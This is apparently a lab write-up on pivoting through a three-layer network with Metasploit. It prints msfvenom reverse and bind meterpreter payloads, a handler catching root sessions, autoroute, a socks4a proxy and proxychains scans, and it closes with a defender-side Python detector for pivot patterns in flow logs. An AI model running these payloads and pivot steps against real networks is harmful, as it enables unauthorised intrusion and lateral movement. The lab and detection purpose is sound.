Intranet Pivoting Across a Multi-Layer Network
September 11, 2020 · Web penetration testing
Environment
Attack machine: Kali
Targets:
Layer 1: Ubuntu 16, running an Apache service
Layer 2: Windows 10, running a Python HTTP server
Layer 3: Ubuntu 18, running a Python HTTP server
Network topology:
Layer 1 target
Generate shell.elf with msfvenom:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.37.129.4 LPORT=10001 -f elf > shell.elf
Catch the shell with an msf handler:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.37.129.4
lhost => 10.37.129.4
msf5 exploit(multi/handler) > set lport 10001
lport => 10001
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.37.129.4:10001
[*] Sending stage (3021284 bytes) to 10.37.129.3
[*] Meterpreter session 1 opened (10.37.129.4:10001 -> 10.37.129.3:51818) at 2020-09-11 11:59:42 +0800
meterpreter > shell
Process 5755 created.
Channel 1 created.
whoami
root
exit
meterpreter > ipconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : enp0s5
Hardware MAC : 00:1c:42:bf:dc:a6
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.37.129.3
IPv4 Netmask : 255.255.255.0
IPv6 Address : fdb2:2c26:f4e4:1:acba:39b0:bd5c:a5de
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::593f:cc6d:4234:e5e6
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : enp0s6
Hardware MAC : 00:1c:42:dd:88:60
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.37.132.4
IPv4 Netmask : 255.255.255.0
IPv6 Address : fdb2:2c26:f4e4:2:2126:9877:d1c1:6a6d
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::f69e:4ffb:a6c2:77cd
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fdb2:2c26:f4e4:2:e68c:2f44:d7a9:162a
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 4
============
Name : docker0
Hardware MAC : 02:42:35:29:f2:ef
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 172.17.0.1
IPv4 Netmask : 255.255.0.0
meterpreter >
The 10.37.132.4 interface reveals the second-layer network. Add a route to it through msf:
meterpreter > run autoroute -s 10.37.132.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.37.132.0/255.255.255.0...
[+] Added route to 10.37.132.0/255.255.255.0 via 10.37.129.3
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.37.132.0 255.255.255.0 Session 1
meterpreter >
Then run background to return to the msf prompt, and use auxiliary/scanner/portscan/tcp to scan the second-layer network for hosts with port 80 open:
msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.37.132.1/24
RHOSTS => 10.37.132.1/24
msf5 auxiliary(scanner/portscan/tcp) > set ports 80
ports => 80
msf5 auxiliary(scanner/portscan/tcp) > run
[+] 10.37.132.4: - 10.37.132.4:80 - TCP OPEN
[+] 10.37.132.5: - 10.37.132.5:80 - TCP OPEN
[*] 10.37.132.1/24: - Scanned 26 of 256 hosts (10% complete)
[*] 10.37.132.1/24: - Scanned 52 of 256 hosts (20% complete)
[*] 10.37.132.1/24: - Scanned 77 of 256 hosts (30% complete)
[*] 10.37.132.1/24: - Scanned 103 of 256 hosts (40% complete)
10.37.132.5 is alive. Use msf to set up a socks4a proxy:
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVPORT 9999
SRVPORT => 9999
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/socks4a) >
[*] Starting the socks4a proxy server
msf5 auxiliary(server/socks4a) > show options
Module options (auxiliary/server/socks4a):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 9999 yes The port to listen on.
Auxiliary action:
Name Description
---- -----------
Proxy
msf5 auxiliary(server/socks4a) >
Point the browser on Kali at the proxy 127.0.0.1:9000; the service exposed by the second-layer host 10.37.132.5 can then be reached through the browser.
Use proxychains to extend what can be run through the proxy. Configure /etc/proxychains.conf:
dynamic_chain
socks4 127.0.0.1 9999
Note that proxychains does not support the UDP and ICMP protocols.
Scanning with proxychains + nmap:
proxychains nmap -sT -Pn 10.37.132.5
Nmap scan report for windows10.host-only--2 (10.37.132.5)
Host is up (0.0020s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 23.29 seconds
To connect to the second-layer target we need a bind (forward) connection, because the second-layer target cannot reach our attack machine directly. Generate the Windows backdoor:
msfvenom -p windows/meterpreter/bind_tcp LPORT=6668 -f exe > shell_3.exe
Connect from msf:
msf5 auxiliary(scanner/portscan/tcp) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 10.37.132.5
rhost => 10.37.132.5
msf5 exploit(multi/handler) > set lport 6668
lport => 6668
msf5 exploit(multi/handler) > exploit -j
[*] Started bind TCP handler against 10.37.132.5:6668
[*] Sending stage (180291 bytes) to 10.37.132.5
[*] 10.37.132.5 - Meterpreter session 3 closed. Reason: Died
[*] Meterpreter session 3 opened (10.37.129.4-10.37.129.3:0 -> 10.37.132.5:6668) at 2020-09-11 17:29:25 +0800
msf5 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x64/linux uid=0, gid=0, euid=0, egid=0 @ 10.37.129.3 10.37.129.4:10001 -> 10.37.129.3:53086 (10.37.129.3)
4 meterpreter x86/windows F449\radish @ F449 10.37.129.4-10.37.129.3:0 -> 10.37.132.5:6668 (10.37.132.5)
msf5 exploit(multi/handler) > sessions -i 4
[*] Starting interaction with 4...
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(multi/handler) > sessions -i 4
[*] Starting interaction with 4...
meterpreter > ls
Set up the route from the second-layer session:
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.37.132.0 255.255.255.0 Session 2
meterpreter > run autoroute -s 10.37.133.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.37.133.0/255.255.255.0...
[-] Could not execute autoroute: ArgumentError Invalid :session, expected Session object got Msf::Sessions::Meterpreter_x86_Win
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.37.132.0 255.255.255.0 Session 2
10.37.133.0 255.255.255.0 Session 4
meterpreter >
I don't know why this error is reported, but the browser proxy can reach the third-layer machine.
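The pivot chain above (a long-lived reverse session from the dual-homed Ubuntu host, then a fan-out scan of 10.37.132.0/24 from its second interface via the autoroute, then the bind session to 10.37.132.5:6668) leaves a recognisable footprint in ordinary flow logs. The following Python is an added, defender-side example that is not part of the original post; the flow records, the HOST_ADDRS inventory, the host names and the thresholds are constructed for this lab and would come from a flow collector and an asset inventory in practice.

```python
from collections import defaultdict
from ipaddress import ip_network

# Constructed flow records shaped like (timestamp, src, dst, dport, duration_s), mirroring
# the lab: the dual-homed Ubuntu box (10.37.129.3 / 10.37.132.4) holds a long reverse
# session to the attack box on 10001, then fans out from its second interface to
# 10.37.132.0/24 port 80 via the autoroute and finally opens the bind session on 6668.
FLOWS = [
    (100, "10.37.129.3", "10.37.129.4", 10001, 3600),
    (101, "10.37.129.5", "10.37.129.9", 443, 4),
    *[(130 + i, "10.37.132.4", f"10.37.132.{i}", 80, 1) for i in range(1, 40)],
    (200, "10.37.132.4", "10.37.132.5", 6668, 900),
]

# Constructed asset inventory: which addresses belong to the same host. Without it,
# the sweep from 10.37.132.4 and the session from 10.37.129.3 look unrelated.
HOST_ADDRS = {
    "ubuntu16-web": {"10.37.129.3", "10.37.132.4"},
    "ubuntu16-other": {"10.37.129.5"},
}

FAN_OUT_MIN = 20                   # distinct hosts hit inside one /24 to count as a sweep
SESSION_MIN_S = 600                # duration that counts as a long-lived session
COMMON_PORTS = {22, 53, 80, 443}   # ports where a long session is unremarkable

def addr_to_host(addr):
    """Map an address to its inventory host name; unknown addresses stand alone."""
    for host, addrs in HOST_ADDRS.items():
        if addr in addrs:
            return host
    return addr

def find_pivot_candidates(flows):
    """Return hosts that both keep a long uncommon-port session and sweep a /24."""
    long_sessions = defaultdict(list)                 # host -> [(dst, dport)]
    fan_out = defaultdict(lambda: defaultdict(set))   # host -> /24 -> {dst}
    for _ts, src, dst, dport, dur in flows:
        host = addr_to_host(src)
        if dur >= SESSION_MIN_S and dport not in COMMON_PORTS:
            long_sessions[host].append((dst, dport))
        fan_out[host][ip_network(f"{dst}/24", strict=False)].add(dst)
    findings = {}
    for host, nets in fan_out.items():
        swept = sorted(str(n) for n, dsts in nets.items() if len(dsts) >= FAN_OUT_MIN)
        if swept and host in long_sessions:
            findings[host] = {"session_peers": long_sessions[host], "swept_subnets": swept}
    return findings
```

Either indicator alone is noisy (monitoring agents keep long sessions, vulnerability scanners sweep subnets), which is why the rule requires both on the same inventory host.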